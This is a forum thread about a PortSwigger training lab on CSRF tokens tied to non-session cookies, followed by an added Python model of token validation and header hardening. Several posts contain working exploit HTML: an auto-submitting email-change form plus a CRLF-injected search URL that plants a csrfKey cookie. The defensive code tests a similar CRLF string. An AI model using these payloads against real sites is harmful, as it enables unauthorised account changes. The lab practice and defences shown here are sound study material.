Burp Suite User Forum


Lab: CSRF where token is tied to non-session cookie

rmotta | Last updated: Aug 15, 2024 11:46AM UTC

Hello! I'm stuck in this lab... I already followed the solution from Burp and the community as given in the lab, but I always get "Invalid CSRF token". Maybe there is a bug in this lab? I'm trying to exploit "wiener" using "carlos" tokens but it's not working. Here is my exploit:

<html>
  <body>
    <form method="POST" action="https://0a2e009404999fd4800b0920006a00de.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="cccc%40f"/>
      <input type="hidden" name="csrf" value="HiEQquPVnTfsVCUTDoPp1mCT7pkQDJ48"/>
      <input type="submit" value="Submit">
    </form>
    <img src="https://0a2e009404999fd4800b0920006a00de.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=b7IrmhuKXoM3v8Z8G0SdyYHgCN3gCtKP%3b%20SameSite=None" onerror="document.forms[0].submit()">
  </body>
</html>

wiener csrf = HiEQquPVnTfsVCUTDoPp1mCT7pkQDJ48
wiener csrfKey cookie = iIvVbgZhPWlx6E6Jqyt483YAny00nmpW
carlos csrf = ZJc6Qqx1QiDPzbamsKfYRtQ8WI0Y58sJ
carlos csrfKey cookie = b7IrmhuKXoM3v8Z8G0SdyYHgCN3gCtKP

Can I have some help?

Ben, PortSwigger Agent | Last updated: Aug 16, 2024 07:01AM UTC

Hi, having just run through this particular lab, I was able to solve it using the written solution provided, so it is working as expected. Looking at your exploit, you need to use your CSRF token and your CSRF key value in your exploit.

rmotta | Last updated: Aug 19, 2024 11:49AM UTC

I've been trying this lab for almost 1 week... I really need help.

Exploit:

<html>
  <body>
    <form method="POST" action="https://0aa100fe04e8804c810c521d00c000a9.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="cccce%40f.com"/>
      <input type="hidden" name="csrf" value="69n2Euu9pGKj9Hgk6JrH2nY76Hvn53ji"/>
      <input type="submit" value="Submit">
    </form>
    <img src="https://0aa100fe04e8804c810c521d00c000a9.web-security-academy.net/?search=testa%0d%0aSet-Cookie:%20csrfKey=PBNFODu9HZm3xo2wNFX1FyfUlg3ybj5e%3b%20SameSite=None" onerror="document.forms[0].submit()">
  </body>
</html>

Viewer (victim) csrf: CJaFXWx9obzTqTK7ik3gqsZQsSoIJbKB
Viewer (victim) csrfKey cookie: BnPFgIiGm2ykpiyVUTehyUlwZiDkTtiP
Carlos (attacker) csrf: 69n2Euu9pGKj9Hgk6JrH2nY76Hvn53ji
Carlos (attacker) csrfKey cookie: PBNFODu9HZm3xo2wNFX1FyfUlg3ybj5e

rmotta | Last updated: Aug 19, 2024 11:50AM UTC

It's still saying: "Invalid CSRF token"

Ben, PortSwigger Agent | Last updated: Aug 19, 2024 12:26PM UTC

Hi, just to clarify: your user is the 'wiener' user and you are delivering your exploit to the 'carlos' user.

rmotta | Last updated: Aug 20, 2024 11:41AM UTC

I'm logged into the wiener account, then I go to the exploit server, then craft the exploit like mentioned before using the "carlos" token and cookie... then I click "view exploit" and I get the message: "Invalid CSRF token". I tested these tokens directly in Burp and it works.

rmotta | Last updated: Aug 20, 2024 11:50AM UTC

Bro, finally I finished, but something was wrong in the payload, because I was reading the forum answers from other users and I tested another payload and it works:

<html>
  <body>
    <form method="POST" action="https://0aa800ce0356ad7680266786004700ad.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="pwneda1321@evil-user.net" />
      <input type="hidden" name="csrf" value="JigFVu1ixnm73M9ay1eMAvMK5Kh8faTB" />
      <input type="submit" name="Submit request" />
    </form>
    <img src="https://0aa800ce0356ad7680266786004700ad.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=bPT1E8Qu1AvEkai77WMRyplTDeo7vrW7%3b%20SameSite=None" onerror="document.forms[0].submit()">
  </body>
</html>

Thanks for the help!

whiteTea | Last updated: Sep 29, 2024 01:00PM UTC

No, neither solution works. And I'm a little surprised that you're asking if Rmotta sent the exploit to Carlos. Carlos is just an account to help us identify the case where the token is bound to a non-session cookie. That's why we have the credentials of wiener and carlos to test it. This is not the first time that the labs have not worked. Support has suggested that there may be issues with the victim browser. In this lab I tried my solution, the solution given by portswigger and the youtube solution. None of them worked. I had solved this lab several times before. Like I said, many, many exercises on portswigger have not worked properly lately. In the beginning it was fine for me because the exercises are free. But now it's very frustrating because I want to prepare for the BURP certification. But in reality, it's not possible to train when it feels like every 4th lab is broken (very annoying, especially with the mystic labs) and I wonder if I made a mistake myself or got another broken lab. Of course I don't blame you Support for this and this is not meant to be taken as an attack. I know you are doing your best, but perhaps you can pass on the frustration of the customers to your management. Best regards, whitetea

Ben, PortSwigger Agent | Last updated: Sep 30, 2024 10:24AM UTC

Hi, I was trying to make sure that the correct csrf and csrfKey values were being used in the exploit that was delivered. We are still experiencing some intermittent issues with the labs - these have proved difficult to diagnose because of the transient nature of them. The team are, however, once again, looking into this. Having said the above, I have just run through this lab, as of right now, and been able to solve it using the solution provided.

Matthew | Last updated: Oct 02, 2024 12:08PM UTC

Well just eyeballing the first attempt, it looks like you mixed the csrf token and csrf key across accounts, so since they are not tied together it will not work.
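The point Ben and Matthew both make (the csrf token and the csrfKey cookie must be a matching pair, and the pair is not tied to the session) is easier to see with a small model of the server-side check. The following is an added example written for this thread; it is not PortSwigger's lab code and does not claim to know how the lab derives its tokens. It assumes the token is an HMAC over the csrfKey (the "weak" scheme the lab describes), contrasts it with a token bound to the session id as well, and adds the header-value check that would have stopped the reflected Set-Cookie in the first place. All secrets, session ids and cookie values are constructed.

```python
import hashlib
import hmac

# Constructed server-side secret for this example only; a real deployment
# would load it from a secret store rather than hard-code it.
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"


def issue_token_weak(csrf_key: str) -> str:
    """Lab-style token: derived from the csrfKey cookie alone (assumed scheme).

    Any browser carrying this csrfKey passes validation with this token,
    regardless of which session the request belongs to.
    """
    return hmac.new(SERVER_SECRET, csrf_key.encode(), hashlib.sha256).hexdigest()


def validate_weak(csrf_key_cookie: str, csrf_token: str) -> bool:
    """Accept the request only if token and csrfKey are a matching pair."""
    expected = issue_token_weak(csrf_key_cookie)
    return hmac.compare_digest(expected, csrf_token)


def issue_token_bound(session_id: str, csrf_key: str) -> str:
    """Hardened token: bound to the session id as well as the csrfKey."""
    msg = f"{session_id}|{csrf_key}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def validate_bound(session_id: str, csrf_key_cookie: str, csrf_token: str) -> bool:
    """A pair minted for one session is rejected when presented under another."""
    expected = issue_token_bound(session_id, csrf_key_cookie)
    return hmac.compare_digest(expected, csrf_token)


def safe_header_value(value: str) -> str:
    """Reject CR/LF in any user-controlled value written into a response header.

    Reflecting the search term into a header without this check is what lets
    a request append an extra Set-Cookie line.
    """
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in header value")
    return value


# Constructed sample accounts: session ids and csrfKey cookie values.
WIENER = {"session": "sess-wiener-constructed", "csrfKey": "key-wiener-constructed"}
CARLOS = {"session": "sess-carlos-constructed", "csrfKey": "key-carlos-constructed"}


def scenarios() -> dict:
    """Run the cases discussed in the thread; every value should be True."""
    wiener_token = issue_token_weak(WIENER["csrfKey"])
    carlos_token = issue_token_weak(CARLOS["csrfKey"])
    return {
        # First post: wiener's token paired with carlos's csrfKey -> rejected.
        "mixed_pair_rejected": not validate_weak(CARLOS["csrfKey"], wiener_token),
        # A matching pair passes the weak check no matter whose session it is.
        "matching_pair_accepted": validate_weak(CARLOS["csrfKey"], carlos_token),
        # Session-bound scheme: carlos's matching pair fails under wiener's session.
        "bound_rejects_other_session": not validate_bound(
            WIENER["session"], CARLOS["csrfKey"],
            issue_token_bound(CARLOS["session"], CARLOS["csrfKey"])),
        # ...but wiener's own pair under wiener's session is accepted.
        "bound_accepts_own_session": validate_bound(
            WIENER["session"], WIENER["csrfKey"],
            issue_token_bound(WIENER["session"], WIENER["csrfKey"])),
    }


def header_check_rejects_crlf() -> bool:
    """Constructed search term with a CRLF: the hardened setter must refuse it."""
    try:
        safe_header_value("test\r\nSet-Cookie: csrfKey=constructed")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for name, ok in scenarios().items():
        print(f"{name}: {ok}")
    print(f"header_check_rejects_crlf: {header_check_rejects_crlf()}")
```

The first scenario reproduces the failure in the opening post under this model: the token belongs to one csrfKey and the cookie to another, so the pair does not verify. The remaining scenarios show why pairing alone is not enough: once the token is bound to the session cookie, a pair minted in another session is rejected even if the attacker can plant their own csrfKey, and rejecting CR/LF in reflected header values removes the way that cookie gets planted.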
